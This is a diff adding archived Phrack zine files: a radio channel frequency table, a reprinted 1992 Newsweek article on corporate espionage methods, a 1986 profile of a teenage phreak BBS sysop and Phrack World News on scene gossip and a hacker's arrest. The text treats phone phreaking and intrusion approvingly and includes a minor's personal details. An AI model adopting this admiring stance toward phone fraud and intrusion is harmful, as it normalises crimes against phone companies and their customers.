+C-22      894.1315  894.3315  894.5315  894.7315  894.9315
+C-23      894.1375  894.3375  894.5375  894.7375  894.9375
+C-24      894.1435  894.3435  894.5435  894.7435  894.9435
+C-25      894.1495  894.3495  894.5495  894.7495  894.9495
+C-26      894.1555  894.3555  894.5555  894.7555  894.9555
+C-27      894.1615  894.3615  894.5615  894.7615  894.9615
+C-28      894.1675  894.3675  894.5675  894.7675  894.9675
+C-29      894.1735  894.3735  894.5735  894.7735  894.9735
+GB        894.1765  894.3765  894.5765  894.7765  894.9765
+               to        to        to        to        to
+          894.1797  894.3797  894.5797  894.7797  894.9797
+P-6       894.1813  894.3813  894.5813  894.7813  894.9813
+P-5       894.1845  894.3845  894.5845  894.7845  894.9845
+P-4       894.1877  894.3877  894.5877  894.7877  894.9877
+P-3       894.1909  894.3909  894.5909  894.7909  894.9909
+P-2       894.1941  894.3941  894.5941  894.7941  894.9941
+P-1       894.1973  894.3973  894.5973  894.7973  894.9973
+
+
+               5         4         3         2         1
+C-1       895.0055  895.2055  895.4055  895.6055  895.8055
+C-2       895.0115  895.2115  895.4115  895.6115  895.8115
+C-3       895.0175  895.2175  895.4175  895.6175  895.8175
+C-4       895.0235  895.2235  895.4235  895.6235  895.8235
+C-5       895.0295  895.2295  895.4295  895.6295  895.8295
+C-6       895.0355  895.2355  895.4355  895.6355  895.8355
+C-7       895.0415  895.2415  895.4415  895.6415  895.8415
+C-8       895.0475  895.2475  895.4475  895.6475  895.8475
+C-9       895.0535  895.2535  895.4535  895.6535  895.8535
+C-10      895.0595  895.2595  895.4595  895.6595  895.8595
+C-11      895.0655  895.2655  895.4655  895.6655  895.8655
+C-12      895.0715  895.2715  895.4715  895.6715  895.8715
+C-13      895.0775  895.2775  895.4775  895.6775  895.8775
+C-14      895.0835  895.2835  895.4835  895.6835  895.8835
+C-15      895.0895  895.2895  895.4895  895.6895  895.8895
+C-16      895.0955  895.2855  895.4955  895.6955  895.8955
+C-17      895.1015  895.3015  895.5015  895.7015  895.9015
+C-18      895.1075  895.3075  895.5075  895.7075  895.9075
+C-19      895.1135  895.3135  895.5135  895.7135  895.9135
+C-20      895.1195  895.3195  895.5195  895.7195  895.9195
+C-21      895.1255  895.3255  895.5255  895.7255  895.9255
+C-22      895.1315  895.3315  895.5315  895.7315  895.9315
+C-23      895.1375  895.3375  895.5375  895.7375  895.9375
+C-24      895.1435  895.3435  895.5435  895.7435  895.9435
+C-25      895.1495  895.3495  895.5495  895.7495  895.9495
+C-26      895.1555  895.3555  895.5555  895.7555  895.9555
+C-27      895.1615  895.3615  895.5615  895.7615  895.9615
+C-28      895.1675  895.3675  895.5675  895.7675  895.9675
+C-29      895.1735  895.3735  895.5735  895.7735  895.9735
+GB        895.1765  895.3765  895.5765  895.7765  895.9765
+               to        to        to        to        to
+          895.1797  895.3797  895.5797  895.7797  895.9797
+P-6       895.1813  895.3813  895.5813  895.7813  895.9813
+P-5       895.1845  895.3845  895.5845  895.7845  895.9845
+P-4       895.1877  895.3877  895.5877  895.7877  895.9877
+P-3       895.1909  895.3909  895.5909  895.7909  895.9909
+P-2       895.1941  895.3941  895.5941  895.7941  895.9941
+P-1       895.1973  895.3973  895.5973  895.7973  895.9973
+
+
+GEOGRAPHICAL CHANNEL BLOCK LAYOUT
+
+(Ground stations using the same channel block must be at least 300 miles apart)
+
+LOCATION            CH. BLOCK
+ALASKA
+     Anchorage      8
+     Cordova        5
+     Ketchikan      5
+     Juneau         4
+     Sitka          7
+     Yakutat        8
+ALABAMA
+     Birmingham     2
+ARIZONA
+     Phoenix        4
+     Winslow        6
+ARKANSAS
+     Pine Bluff     8
+CALIFORNIA
+     Blythe         10
+     Eureka         8
+     Los Angeles    4
+     Oakland        1
+     S. San Fran.   6
+     Visalia        7
+COLORADO
+     Colorado Spgs. 8
+     Denver         1
+     Hayden         6
+FLORIDA
+     Miami          4
+     Orlando        2
+     Tallahassee    7
+GEORGIA
+     Atlanta        5
+     St. Simons Is. 6
+HAWAII
+     Mauna Kapu     5
+IDAHO
+     Blackfoot      8
+     Caldwell       10
+ILLINOIS
+     Chicago        3
+     Kewanee        5
+     Schiller Park  2
+INDIANA
+     Fort Wayne     7
+IOWA
+     Des Moines     1
+KANSAS
+     Garden City    3
+     Wichita        7
+KENTUCKY
+     Fairdale       6
+LOUISIANA
+     Kenner         3
+     Shreveport     5
+MASSACHUSETTS
+     Boston         7
+MICHIGAN
+     Bellville      8
+     Flint          9
+     Sault S. Marie 6
+MINNESOTA
+     Bloomington    9
+MISSISSIPPI
+     Meridian       9
+MISSOURI
+     Kansas City    6
+     St. Louis      4
+     Springfield    9
+MONTANA
+     Lewistown      5
+     Miles City     8
+     Missoula       3
+NEBRASKA
+     Grand Island   2
+     Ogallala       4
+NEVADA
+     Las Vegas      1
+     Reno           3
+     Tonopah        9
+     Winnemucca     4
+NEW MEXICO
+     Alamogordo     8
+     Albuquerque    10
+     Aztec          9
+     Clayton        5
+NEW JERSEY
+     Woodbury       3
+NEW YORK
+     E. Elmhurst    1
+     Schuyler       2
+     Staten Island  9
+NORTH CAROLINA
+     Greensboro     9
+     Wilmington     3
+NORTH DAKOTA
+     Dickinson      7
+OHIO
+     Pataskala      1
+OKLAHOMA
+     Warner         4
+     Woodward       9
+OREGON
+     Albany         5
+     Klamath Falls  2
+     Pendleton      7
+PENNSYLVANIA
+     Coraopolis     4
+     New Cumberland 8
+SOUTH CAROLINA
+     Charleston     4
+SOUTH DAKOTA
+     Aberdeen       6
+     Rapid City     5
+TENNESSEE
+     Elizabethton   7
+     Memphis        10
+     Nashville      3
+TEXAS
+     Austin         2
+     Bedford        1
+     Houston        9
+     Lubbock        7
+     Monahans       6
+UTAH
+     Abajo Peak     7
+     Delta          2
+     Escalante      5
+     Green River    3
+     Salt Lake City 1
+VIRGINIA
+     Arlington      6
+WASHINGTON
+     Seattle        4
+     Cheney         1
+WEST VIRGINIA
+     Charleston     2
+WISCONSIN
+     Stevens Point  8
+WYOMING
+     Riverton       9
+_______________________________________________________________________________
diff --git a/phrack39/9.txt b/phrack39/9.txt
new file mode 100644
index 0000000..98197ba
--- /dev/null
+++ b/phrack39/9.txt
@@ -0,0 +1,183 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 9 of 13
+
+                               THE OPEN BARN DOOR
+
+                  U.S. Firms Face A Wave Of Foreign Espionage
+
+                               By Douglas Waller
+                         Newsweek, May 4, 1992, Page 58
+
+
+     It's tough enough these days for American companies to compete with their
+Pacific Rim rivals, even when the playing field is level.  It's a lot tougher
+when your trade secrets are peddled by competitors.  One Dallas computer
+maker, for example, recently spotted its sensitive pricing information in the
+bids of a South Korean rival.  The firm hired a detective agency, Phoenix
+Investigations, which found an innocent-looking plastic box in a closet at its
+headquarters.  Inside was a radio transmitter wired to a cable connected to a
+company fax machine.  The bug had been secretly installed by a new worker -- a
+mole planted by the Korean company.  "American companies don't believe this
+kind of stuff can happen," says Phoenix president Richard Aznaran.  "By the
+time they come to us the barn door is wide open."
+
+     Welcome to a world order where profits have replaced missiles as the
+currency of power.  Industrial espionage isn't new, and it isn't always
+illegal, but as firms develop global reach, they are acquiring new
+vulnerability to economic espionage.  In a survey by the American Society for
+Industrial Security last year, 37 percent of the 165 U.S. firms responding said
+they had been targets of spying.  The increase has been so alarming that both
+the CIA and the FBI have beefed up their economic counterintelligence programs.
+The companies are mounting more aggressive safeguards, too.  Kellog Company has
+halted public tours at its Battle Creek, Michigan, facility because spies were
+slipping in to photograph equipment.  Eastman Kodak Company classifies
+documents, just like the government.  Lotus Development Corporation screens
+cleaning crews that work at night.  "As our computers become smaller, it's
+easier for someone to walk off with one," says Lotus spokesperson Rebecca Seel.
+
+     To be sure, some U.S. firms have been guilty of espionage themselves --
+though they tend not to practice it overseas, because foreign companies have a
+tighter hold on their secrets.  And American companies now face an additional
+hazard:  The professional spy services of foreign nations.  "We're finding
+intelligence organizations from countries we've never looked at before who are
+active in the U.S.," says the FBI's R. Patrick Watson.  Foreign intelligence
+agencies traditionally thought friendly to the United States "are trying to
+plant moles in American high-tech companies [and] search the briefcases of
+American business men traveling overseas," warns CIA Director Robert Gates.
+Adds Noell Matchett, a former National Security Agency official:  "What we've
+got is this big black hole of espionage going on all over the world and a naive
+set of American business people being raped."
+
+     No one knows quite how much money U.S. businesses lost to this black hole.
+Foreign governments refuse to comment on business intelligence they collect.
+The victims rarely publicize the espionage or report it to authorities for fear
+of exposing vulnerabilities to stockholders.  But more than 30 companies and
+security experts NEWSWEEK contacted claimed billions of dollars are lost
+annually from stolen trade secrets and technology.  This week a House Judiciary
+subcommittee is holding hearings to assess the damage.  IBM, which has been
+targeted by French and Japanese intelligence operations, estimates $1 billion
+lost from economic espionage and software piracy.  IBM won't offer specifics,
+but says that the espionage "runs the gamut from items missing off loading
+docks to people looking over other people's shoulders in airplanes."
+
+     Most brazen: France's intelligence service, the Direction Generale de la
+Securite Exterieure (DGSE), has been the most brazen about economic espionage,
+bugging seats of businessmen flying on airliners and ransacking their hotel
+rooms for documents, say intelligence sources.  Three years ago the FBI
+delivered private protests to Paris after it discovered DGSE agents trying to
+infiltrate European branch offices of IBM and Texas Instruments to pass secrets
+to a French competitor.  The complaint fell on deaf ears.  The French
+intelligence budget was increased 9 percent this year, to enable the hiring of
+1,000 new employees.  A secret CIA report recently warned of French agents
+roaming the United States looking for business secrets.  Intelligence sources
+say the French Embassy in Washington has helped French engineers spy on the
+stealth technology used by American warplane manufacturers.  "American
+businessmen who stay in Paris hotels should still assume that the contents of
+their briefcases will be photocopied," says security consultant Paul Joyal.
+DGSE officials won't comment.
+
+     The French are hardly alone in business spying.  NSA officials suspect
+British intelligence of monitoring the overseas phone calls of American firms.
+Investigators who just broke up a kidnap ring run by former Argentine
+intelligence and police officials suspect the ring planted some 500 wiretaps on
+foreign businesses in Buenos Aires and fed the information to local firms.  The
+Ackerman Group Inc., a Miami consulting firm that tracks espionage, recently
+warned clients about Egyptian intelligence agents who break into the hotel
+rooms of visiting execs with "distressing frequency."
+
+     How do the spies do it?  Bugs and bribes are popular tools.  During a
+security review of a U.S. manufacturer in Hong Kong, consultant Richard
+Hefferman discovered that someone had tampered with the firm's phone-switching
+equipment in a closet.  He suspects that agents posing as maintenance men
+sneaked into the closet and reprogrammed the computer routing phone calls so
+someone outside the building -- Heffernan never determined who -- could listen
+in simply by punching access codes into his phone.  Another example:  After
+being outbid at the last minute by a Japanese competitor, a Midwestern heavy
+manufacturer hired Parvus Company, a Maryland security firm made up mostly of
+former CIA and NSA operatives.  Parvus investigators found that the Japanese
+firm had recruited one of the manufacturer's midlevel managers with a drug
+habit to pass along confidential bidding information.
+
+     Actually, many foreign intelligence operations are legal.  "The science
+and technology in this country is theirs for the taking so they don't even have
+to steal it," says Michael Sekora of Technology Strategic Planning, Inc.  Take
+company newsletters, which are a good source of quota data.  With such
+information in hand, a top agent can piece together production rates.
+American universities are wide open, too: Japanese engineers posing as students
+feed back to their home offices information on school research projects.
+"Watch a Japanese tour team coming through a plant or convention," says Robert
+Burke with Monsanto Company.  "They video everything and pick up every sheet of
+paper."
+
+     Computer power:  In the old days a business spy visited a bar near a plant
+to find loose-lipped employees.  Now all he needs is a computer, modem and
+phone.  There are some 10,000 computer bulletin boards in the United States --
+informal electronic networks that hackers, engineers, scientists and
+government bureaucrats set up with their PCs to share business gossip, the
+latest research on aircraft engines, even private White House phone numbers.
+
+     An agent compiles a list of key words for the technology he wants, which
+trigger responses from bulletin boards.  Then, posing as a student wanting
+information, he dials from his computer the bulletin boards in a city where
+the business is located and "finds a Ph.D. who wants to show off," says Thomas
+Sobczak of Application Configured Computers, Inc.  Sobczak once discovered a
+European agent using a fake name who posed questions about submarine engines to
+a bulletin board near Groton, Connecticut.  The same questions, asked under a
+different hacker's name, appeared on bulletin boards in Charleston, South
+Carolina, and Bremerton, Washington.  Navy submarines are built or based at all
+three cities.
+
+     Using information from phone intercepts, the NSA occasionally tips off
+U.S. firms hit by foreign spying.  In fact, Director Gates has promised he'll
+do more to protect firms from agents abroad by warning them of hostile
+penetrations.  The FBI has expanded its economic counterintelligence program.
+The State Department also has begun a pilot program with 50 Fortune 500
+companies to allow their execs traveling abroad to carry the same portable
+secure phones that U.S. officials use.
+
+     But U.S. agencies are still groping for a way to join the business spy
+war.  The FBI doesn't want companies to have top-of-the-line encryption devices
+for fear the bureau won't be able to break their codes to tap phone calls in
+criminal investigations.  And the CIA is moving cautiously because many of the
+foreign intelligence services "against whom you're going to need the most
+protection tend to be its closest friends," says former CIA official George
+Carver.  Even American firms are leery of becoming too cozy with their
+government's agents.  But with more foreign spies coming in for the cash,
+American companies must do more to protect their secrets.
+
+                              How the Spies Do It
+
+MONEY TALKS
+
+     Corporate predators haven't exactly been shy about greasing a few palms.
+In some cases they glean information simply by bribing American employees.  In
+others, they lure workers on the pretense of hiring them for an important job,
+only to spend the interview pumping them for information.  If all else fails,
+the spies simply hire the employees away to get at their secrets, and chalk it
+all up to the cost of doing business.
+
+STOP, LOOK, LISTEN
+
+     A wealth of intelligence is hidden in plain sight -- right inside public
+records such as stockholder reports, newsletters, zoning applications and
+regulatory filings.  Eavesdropping helps, too.  Agents can listen to execs'
+airplane conversations from six seats away.  Some sponsor conferences and
+invite engineers to present papers.  Japanese businessmen are famous for
+vacuuming up handouts at conventions and snapping photos on plant tours.
+
+BUGS
+
+     Electronic transmitters concealed inside ballpoint pens, pocket
+calculators and even wall paneling can broadcast conversations in sensitive
+meetings.  Spies can have American firms' phone calls rerouted from the
+switching stations to agents listening in.  Sometimes, they tap cables attached
+to fax machines.
+
+HEARTBREAK HOTEL
+
+     Planning to leave your briefcase back at the hotel?  The spooks will love
+you.  One of their ploys is to sneak into an room, copy documents and pilfer
+computer disks.  Left your password sitting around?  Now they have entry to
+your company's entire computer system.
+_______________________________________________________________________________
diff --git a/phrack4/1.txt b/phrack4/1.txt
new file mode 100644
index 0000000..6e4ed22
--- /dev/null
+++ b/phrack4/1.txt
@@ -0,0 +1,175 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #1 of 11
+
+                            ==Phrack Pro-Phile I==
+
+                       Written and Created by Taran King
+
+                                    3/13/86
+
+         Welcome to Phrack Pro-Phile I.  I started thinking about it and
+personally had always been interested in people's backgrounds, especially those
+who are around a lot, have been around for a long time, or are sysops.  This
+new feature of Phrack Inc. will present info about various members of the
+phreak/hack community ranging from personal to public.  This month's
+interviewee....
+
+                                 Crimson Death
+                                 ~~~~~~~ ~~~~~
+
+         Crimson Death is the sysop of Hell Phrozen Over, a private phreak/hack
+bulletin board in Philadelphia, PA. (215).
+-------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Crimson Death
+           Call him: Robb
+       Past handles: The Sorcerer (before he was a phreak, a pirate handle)
+      Handle origin: AD&D Monster Manual II
+      Date of Birth: February 17,
+Age at current date: 16 years old
+             Height: 5'3"
+             Weight: 110 lbs
+          Eye color: Brown outlined with green
+         Hair Color: Dark brown
+           Computer: Apple //e with 10 meg hard drive
+  Sysop/Co-Sysop of: Hell Phrozen Over, Missing Link, Skull Kingdom
+-------------------------------------------------------------------------------
+         Crimson Death started out in the BBS world in 1984 with a public
+board, Spirit World, which was run on an Apple //e, 2 floppies, GBBS, and 300
+baud.  He had originally gotten his Apple computer in January of 1984.  Then,
+on one memorable day, The Videosmith logged onto his board and they became
+friends.  In February of 1985, he started phreaking.  When his 10 meg Sider
+came, he started Hell Phrozen Over as a private bulletin board system.  Death
+called a few memorable boards, including the Army BBS, Shadowland, The Missing
+Link, The Labyrinth, as well as his own.  His phreak teacher was The
+Videosmith.
+
+         Robb goes to a public school and has skipped a grade, so he is
+currently one grade ahead of his time.  His phreaking is unknown at school
+except to a few.  He considers himself pretty well versed in programming, and
+from the way his board runs, I would agree.  CD's girlfriend is The Silver Fox,
+(note the word "Fox") that he met on Datanet, and popular opinion says she is
+REALLY decent looking.
+
+         Crimson Death does no hacking right now, but in the future when he
+gets a bit of free time, he plans on learning about it.  Mentioned earlier was
+his involvement in Phreak Klass 2600.  Red Devil has taken it down, and they
+are looking for a replacement board, Phreak Klass II.  Death has met various
+phreaks, old and new, and those of who really stuck out in his mind were: The
+Videosmith, Mark Tabas, TUC, Telenet Bob, The Sprinter, and Dr. Who.  He listed
+others too, but he felt that these were the "mentionables".  Just thought I'd
+let a few out there know.  Hell Phrozen Over is co-sysoped by Silicon Swindler,
+and the Phreak Adviser is The Videosmith, a 300/1200 baud, 10 meg system.  He
+was, in the past, in PhD, which stands for Phreak/Hack Destroyers.  This
+eventually evolved into Camorra.  PhD was run by The Executioner (301), members
+included Red Devil, Silver Sabre, and Scorpion among others.
+
+         He is quite a comedian also, he wishes for all of you to have his last
+name, address, and credit card number (heh heh).  The following are excerpts
+from his Death Plan File, Inc. project.  I hope you find this phile
+interesting.
+-------------------------------------------------------------------------------
+        Interests: Krista, Computers (programming my BBS), telecommunications
+                   (modeming, phreaking), reading books (Sci-Fi/Fantasy) and
+                   magazines (movie mags, Psychology Today, Omni), movies
+                   (circa 1930's to present), writing (short stories, raps,
+                   poems for my girlfriend), music (listening (rap, rock,
+                   jazz, some pop, classical, an occasional love song), playing
+                   guitar and keyboard), origins/beliefs of religions (although
+                   I am not religious at all), mysteries of the Universe, RPG's
+                   (rare these days), the arts (painting/drawing/sketching,
+                   music (as mentioned), art museums), trivia, parapsychology,
+                   comedy.
+
+Crimson Death's Favorite Things
+-------------------------------
+
+       Women: Krista Denise (I won't say last names)
+        Cars: Black Lamborghini's and 1935 Dusenbergs.
+       Foods: Italian food, Chinese, Chocolates, peaches (when perfectly ripe).
+       Music: Doug E. Fresh, Run-D.M.C., The Fat Boys, Kurtis Blow, UTFO, LL
+              Cool J, RUSH, The Who, Led Zeppelin, Billy Ocean, Newcleus,
+              The Rolling Stones, John Williams (w/ The London Symphony),
+     Authors: Piers Anthony, Stephen King, David Eddings, Arthur C. Clarke,
+              Robert Aspirin, Kahlil Gibrahn, L. Frank Baum.
+       Books: The Tarot Trilogy, The Xanth Series, The Belgariad, Elfquest,
+              The Myth Conceptions Series, 2001, 2010.
+  Performers: Bob Hope, Jerry Lewis, Abott & Costello, John Garfield,
+              Stacey Keech, Sean Penn, Eddie Murphy, Sir Lawrence Olivier,
+              Marlon Brando, Gina Davis, David Letterman, Jayne Mansfield,
+              Marilyn Monroe, Scatman Crothers, Pee Wee Herman.
+
+Most Memorable Experiences
+--------------------------
+
+My father dying
+Falling in love
+Meeting Krista for the first time
+Getting Leukemia
+Vomiting in a Hawaiian Punch bottle
+Tabas with one leg over the balcony at The Palace
+Being chased by a 6' 8" homo at P-Con IV
+
+Some People to Mention
+----------------------
+
+Schoolgirl  (the nicest person on Datanet [Hugs!])
+The Heretic (Bizarre, but cool..)
+The Warlock Lord (although we occasionally have our differences)
+Dire Wraith (Hm. Not much to say)
+Tuc (One of the coolest)
+Capt. Zap (a pretty nice guy)
+Bit Man (just learn to not talk so much!)
+Blue Buccaneer (for all he has done (u/l, posts, etc), and being a cool guy)
+Maxwell Smart & The Baron (just cool people..)
+
+People Crimson Death would like to say a few things to
+------------------------------------------------------
+
+Krista (the person I hold dearest to my heart, who I love and cherish even
+        more-so than I do myself; and for being herself)
+
+Silicon Swindler (For being my best friend for the past few years. I would
+                  like to thank him for sticking with me through A LOT
+                  of bad times)
+
+The Videosmith (for introducing me the mystic world of phreaking, being my
+                mentor in this "mystic world", but most of all being a
+                friend)
+
+The Executioner (who can be an egotistical asshole at times, but showed
+                 me he really does care at Phreak Con, when a 6' 8"
+                 ogre wanted my ass)
+
+Red Devil (who has put up with all of my cut-ups and not kicked the
+           shit out of me, even though he could. Sorry about that)
+
+The People at Data-Tek (who put up Datanet in which without it, I would
+                        have never met Krista)
+
+Everyone Else who I didn't mention (for the one's who I know care; and
+                                    the people who put up with my faults)
+
+*TOTAL LOSERS*: The Sting (Otto) (414), Black Majik, Bloody Sabath.
+
+The above three people have busted on me for having had an illness. In May, of
+1983 I was struck with Leukemia, cancer of the blood. Luckily, I was cured
+of this disease, and now lead a normal life. Yes, I was bald at one period of
+time, but I am not now. Even so, that is nothing to bust on. I don't care
+who it is, and what they have done to you, because busting on an illness is
+is pure idiocy. No one understands...until they or someone they love is
+struck.
+-------------------------------------------------------------------------------
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
+the near future.  Oh, and one last thing, I'm taking a poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  Crimson Death says "No".  Thanks for
+your time Robb.
+
+                                            TARAN KING
+                                   SYSOP OF METAL SHOP PRIVATE
+
diff --git a/phrack4/10.txt b/phrack4/10.txt
new file mode 100644
index 0000000..bc6a160
--- /dev/null
+++ b/phrack4/10.txt
@@ -0,0 +1,286 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #10 of 11
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 3 Part 2  ///_  _       ________
+Metal Shop AE      \\\                                  ///| \/ |     / ______/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN III       \\\///\\ Knight Lightning //\\\///  /__________/
+---------------              \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+TAP Revival
+-----------
+The TAP meetings in New York hadn't been going well, every week less people
+would show and it was becoming pointless to attend.  Chesire Catalyst makes
+roughly $1000 a month without printing TAP, and really he sees no reason to
+restart.  Now TAP is being taken over by The W(hack)o Cracko Brothers, INC.
+
+Chesire Catalyst has officially given the TAP name over to TWCB Inc. or has he?
+These answers still remain a mystery.  TWCB plans to change the name of the mag
+but not until after issue one is out.
+
+Supposedly, Chesire had over 500 articles that never saw print that he has been
+holding until the re-opening of TAP.  It is unknown if TWCB and the new TAP
+Staff will acquire these articles.  Also it is unknown as too if some of those
+articles were the ones in issue 91 of TAP that was recently distributed at
+TelePub'86 in New York City.
+
+This new TAP has announced its editors as follows:
+
+West Coast Editors: The Bootleg (Chief), The Cracker, and TUC
+East Coast Editor: Susan Thunder & Scan Man
+Central Editors: Knight Lightning and Taran King
+
+TWCB, has stated that on the day the first issue of TAP sees print, they will
+quit phreaking, as they will undoubtedly be watched very closely from then on.
+
+The status of Whackoland bbs is uncertain.  However TWCB has announced plans
+for a UNIX or Motorola system.
+
+The Staff members include: TWCB Inc., Knight Lightning, Taran King, Scan Man,
+                           The Firelord, Final Impulse, Ninja NYC, Sigmund
+                           Fraud, Silver Spy, The Bootleg, The Cracker, Surfer
+                           Bill, and The Marauder.  Also unconfirmed reports
+                           state that the LOD will be taking an active part in
+                           this new magazine.
+
+Subscription rates are as follows:
+
+$4.00    Singular issue
+$20.00   Half year/6 month subscription
+$35.00   Year subscription
+$100.00  Corporate year subscription, for businesses or government agencies
+
+The $35/One year subscription includes:
+
+o  A years subscription to Tap Magazine (12, 30+ Page Issues).
+o  A free account to TWCB's Unix system (Limited offer).
+o  A free account to TWCB's Watson Message Center (Limited offer).
+
+The magazine will consist of 30-40 color pages and will be using the same type
+of paper as most common everyday magazines (ie. TIME, Newsweek etc).  TAP will
+be published every month.
+
+Tele-Pub meetings will be held once a month at TAP offices in St.Louis, MO.
+
+TWCB is supposedly in the process of organizing a TAP-Tele-Pub Convention to be
+held in St. Louis at the Marriot Hotel (most likely). TWCB says it will be THE
+Largest Phreak/Hackers convention EVER held! They are planning it for the
+Summer of 1986.
+
+For more information on how to become a staff member to to subscribe to TAP
+call 314-527-TWCB.
+
+TAP Offices are located at 12072 Manchester Road, Suite 21, Des Peres, MO
+63131.  Send all subscriptions there in money, checks, or money orders made out
+to Tap Magazine. (Editor's note: It is uncertain as to the true existence of
+this office.  There is always the possibility of it being a mail forwarding
+service).
+-------------------------------------------------------------------------------
+Some of the articles to expect in the first issue are interviews with The
+Bootleg, Scan Man, Surfer Bill (concerning the Teltec Busts), files from
+Bootlegger Magazine Issues (including those from issue #7 which has not yet
+been released, this includes articles from MCI World Magazine, such as the MCI
+World/MCI Security Interview), and NRK 01. TWCB claims to have received over a
+100 articles from TOP Hack/Phreakers.
+-------------------------------------------------------------------------------
+As to the reasons concerning TWCB not appearing at the TAP-TelePub'86, Tim
+posted the following on the Phrack/TAP subboard on Metal Shop PRIVATE:
+
+"Well the meeting totally got screwed I couldn't make it, mainly because
+ Cheshire sorta fucked TAP over. I think he was just in it for the money.  He
+ was supposed to set up a PRIVATE meeting for TAP and it was going to be before
+ the big meeting, well I called some people at the Days in at about 4:00 AM in
+ the morning from the airport, the morning of the meeting, and they say well
+ Cheshire says that the Private meeting is going to be after the Big Meeting
+ and everyone already knows where were going."
+
+"Anyway I couldn't make it cause my plane landed at Laguardi and I was to take
+ the plane back at 11:30 AM, well it takes 45 minutes to get to the Days Inn
+ and didn't want to go to the big meeting because of serious LEGAL troubles."
+
+(Editor's note:  The way I heard it directly from Tim, is that they called from
+ St. Louis International to NYC and heard about the changes and knew about
+ their late plane situation and decided to blow it off.)
+-------------------------------------------------------------------------------
+The following is the story of how TWCB got started with TAP:
+
+At first, there it was... Metal Shop standing proud, the home of Phrack
+Newsletter.  TWCB saw this and put up Whackoland, which many of you may notice
+was made specifically to look like MS.  Furthermore, TWCB was gonna have a
+magazine originally called "Whackoland Gazette" until TWCB realized that with
+Metal Shop and P-80 backing it and not just Whackoland, they would have to
+change the name.  Phrack was supposed to be reprinted in this mag.  The list of
+boards backing it grew quickly.  Still however it was a magazine without a
+name.  Then TWCB started hearing about the revival of TAP and how the meetings
+were not going very well.  They called Chesire Catalyst and started working out
+the preliminary details, which brings us to where we are today.
+-------------------------------------------------------------------------------
+There are those however who would NOT like to see TAP restarted.  Among them,
+2600 Magazine and Project Inform. Who could blame them?  No one likes
+competition. This was okay however until, TWCB got a call from TUC, Lex Luthor,
+Susan Thunder, and Mark Tabas (the staff members of Project Educate). They
+claimed they want TWCB to publish for them, TWCB refused.  Later they received
+a threatening call from TUC, in which they were informed that TUC would have
+security people watching TWCB all the time and when they slipped up...*BOOM*
+
+Now TWCB says that TUC later called and now is fully behind TAP and has
+accepted editorship with TAP.
+-------------------------------------------------------------------------------
+ALL information in this article, excluding the short history and investigative
+sections, was provided by TWCB Inc.  Especially the parts about Project Inform,
+TUC, Lex, etc.
+-------------------------------------------------------------------------------
+TAP's Motto:  Help US fight Your fight! - Join Tap's WAR!
+_______________________________________________________________________________
+
+Phrack/Tap Status Report
+------------------------
+Regardless of the TAP situation, Phrack will remain in publication.  TWCB is
+not very happy about this but, we really don't care.
+
+The reasons that the Teltec Bust story did not appear in this issue of PWN is
+that most of the info we have on it was supplied by Surfer Bill in an interview
+he did with TWCB.  I have the taped interview, but as it was done by TWCB it
+therefore was TAP property.  However, should TAP issue #1 not be in print by
+the time Phrack V is ready, the Teltec story WILL appear in Phrack World News
+Issue Number IV.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Monty Python Retires
+--------------------
+The following message appeared on Stronghold East Elite on Sunday, February 9,
+1986, 4:50:53 PM.
+-------------------------------------------------------------------------------
+  I have formally retired from the phreaking world, permanently.  I have *NOT*
+been busted or been given any heat by anyone or any corporation.  I just have
+no time what-so-ever to devote myself to give phreaking the appropriate time it
+deserves. Schoolwork is bringing me down, and I have a big research paper
+coming up, plus lots of other work.
+  Honestly, phreaking doesn't seem much fun anymore. I especially hate the
+attitudes of some phreaks (who shall remain nameless) who have their head in
+the clouds, and put down everyone else.  It is quite a pain in the ass, and
+these people look like fools, cause they are usually nothing quite like what
+they think they are.
+  My "retirement" entails the ceasing of myself of calling phreak boards,
+hacking, and trashing. If you want to call me up on a conference, don't bother
+(some of you have done so in the past).  I don't have the time and I am not
+interested.
+
+Later on and be seeing you from time to time...
+
+                                 Monty Python
+-------------------------------------------------------------------------------
+Editor's Note:  Monty Python did ask for his account to be kept active at
+                Stronghold East, so that he may see what's new, from time to
+                time.  Also Monty Python has further stated that he may return
+                to the phreak world this summer.
+_______________________________________________________________________________
+
+Demise of The Sprinter
+----------------------
+On the front page of the Wednesday, February 12, 1986 edition of the Seattle
+P-I were the headlines COMPUTER INVASION CHARGED. Kirkland youth accused of
+snooping. Some of the articles highlights were:
+
+  One Michael P. Wilkerson (The Sprinter) was so successful in bypassing four
+companies computer security.  He could copy or destroy data even the sysops
+couldn't touch. The 18 year old most notably tapped into MicroSoft's
+mainframe, along with 3 other companies, Kenworth Truck, Sunstrand Data
+Control, and Resource Conservation companies.
+
+  Looks like the district attorney is asking for a 90 day sentence and will get
+it due to the cooperation (read plea bargaining) given by Sprinter. During the
+search, the police discovered a list of TRW dial-ups and passwords and a
+handwritten list of Visa, Mastercard, and Amex credit card numbers.
+-------------------------------------------------------------------------------
+It turns out that Sprinter is also under investigation for illegal credit card
+purchases in his home state of California.  Most notably a $1400 bicycle.
+
+A real nice point made by the district attorney is that possession of the list
+of card numbers is NOT a crime.  Only the use of them is illegal.
+-------------------------------------------------------------------------------
+Now that was the Seattle P-I's interpretation of those events, this is
+everything else we at Phrack Inc. have been able to uncover.
+-------------------------------------------------------------------------------
+Sprinter got busted for hacking on a large VAX/VMS system, and since it was
+local to him, he didn't bother to go through an extender. He didn't feel there
+was any danger considering he wasn't using a lead number.
+
+Sprinter was well known for his "bible" of Sprint codes that was always kept
+filled.  His bible and all computer equipment were confiscated.
+
+Sprinter has 4 charges of hacking.  One nice part about this is that since his
+bust, Sprinter has received several job offers for computer security, including
